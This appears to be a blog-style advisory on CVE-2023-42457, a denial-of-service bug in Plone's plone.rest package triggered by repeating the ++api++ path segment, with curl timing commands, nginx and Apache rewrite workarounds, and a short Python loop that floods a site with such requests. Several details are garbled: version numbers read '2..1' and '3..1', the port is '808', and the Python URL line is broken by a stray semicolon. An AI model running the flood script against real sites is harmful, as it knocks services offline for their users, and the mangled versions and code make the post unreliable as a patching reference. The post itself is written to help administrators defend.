Plone is a popular open-source content management system (CMS) used by organizations around the world. Its plone.rest package enables modern RESTful HTTP verb support (GET, POST, PUT, DELETE, etc.) through special URL path handling. Recently, CVE-2023-42457 was reported, highlighting a subtle but impactful problem when its unique ++api++ traverser is used in a certain way.
This post will break down what happened, show the bug in action, discuss possible exploits, and point you to fixes and workarounds. All explained simply.
What is CVE-2023-42457?
CVE-2023-42457 is a vulnerability that affects Plone installations using plone.rest versions 2.x before 2..1 and 3.x before 3..1. The bug does not exist in the older 1.x branch.
The Problem
When an attacker puts ++api++ multiple times into the URL (for example, /++api++/++api++/...), Plone's traversal code starts to take more and more time for each extra ++api++ segment. This isn't a crash or data leak, but it slows the server down—potentially to the point where it's unresponsive and can't handle legitimate traffic.
Long story short: Plone starts to crawl to a halt as the ++api++ segments pile up.
Code Example: How An Attacker Could Slow Down Your Site
The critical part is that no authentication is needed—anyone can do this.
A normal REST API call looks like this
GET /plone/++api++/users
But if someone sends
GET /plone/++api++/++api++/++api++/users
or even
GET /plone/++api++/++api++/++api++/++api++/.../users
(filling the URL with lots of ++api++), the server starts doing more work for each extra segment, tying up resources.
Quick demonstration (using curl)
# Safe/normal call:
curl -w "\nTime: %{time_total}\n" -o /dev/null -s http://localhost:808/plone/++api++/users
# Malicious/slow call (with repeated traverser):
curl -w "\nTime: %{time_total}\n" -o /dev/null -s http://localhost:808/plone/++api++/++api++/++api++/users
On a vulnerable system, the second call can take seconds or more, even with just a few repetitions. A well-crafted attack with many repetitions can lock up server threads, causing a mini-denial of service (DoS).
Why Did This Happen?
Inside Plone, the ++api++ syntax is a special path traverser—a way for the system to route REST API calls. The code didn't guard against nested or repeated traversers; each repetition made the traversal logic start over or become more expensive.
This is known as a "path traversal amplification" bug—it doesn’t expose sensitive data, but multiplies server workload per abnormal URL.
Plone 1.x branch not affected
If you use plone.rest for your APIs and your URLs support /++api++, check your version.
Official Patch
Upgrading to either plone.rest 2..1 or 3..1 will fully close the bug. Both are available on PyPI and recommended by the core team.
> Download and release notes:
> - plone.rest 2..1 on PyPI
> - plone.rest 3..1 on PyPI
> - GitHub Advisory
Redirect multiple traversers to just one
location ~* /(\+\+api\+\+/){2,} {
return 301 /++api++$request_uri;
}
Use mod_rewrite
RewriteEngine On
RewriteCond %{REQUEST_URI} ^/(?:\+\+api\+\+/){2,}
RewriteRule ^ /++api++%{REQUEST_URI} [L,R=301]
Remember: This is not a substitute for upgrading, just a safety net.
Exploit Details: Is This Really Dangerous?
The exploit is not about stealing information—it's about starving the system's resources. Someone could run a simple Python script that spams your server with a bunch of URLs like /++api++/++api++/..., tying up all worker threads.
Example attack code
import requests
url = "http://your-plone-site/plone/"; + "++api++/" * 50 + "users"
for i in range(100):
requests.get(url)
If you have a small number of threads serving requests, this tiny script could keep all of them busy with slow requests—making your website hang for everyone else (i.e., "DoS").
References & Further Reading
- CVE listing on NVD
- plone.rest 2..1 release notes
- plone.rest 3..1 release notes
- Plone official security documentation
- GitHub - plone.rest
Monitor your logs for odd-looking API paths.
While this bug doesn't leak data, every minute your site is slow or unavailable is a problem! Keeping up to date and monitoring your endpoints is the best defense.
Any questions or experiences? Share below! Stay safe, Plone admins.
> _This post is exclusive and written simply for administrators and developers running Plone with plone.rest enabled._
Timeline
Published on: 09/21/2023 15:15:00 UTC
Last modified on: 09/25/2023 18:53:00 UTC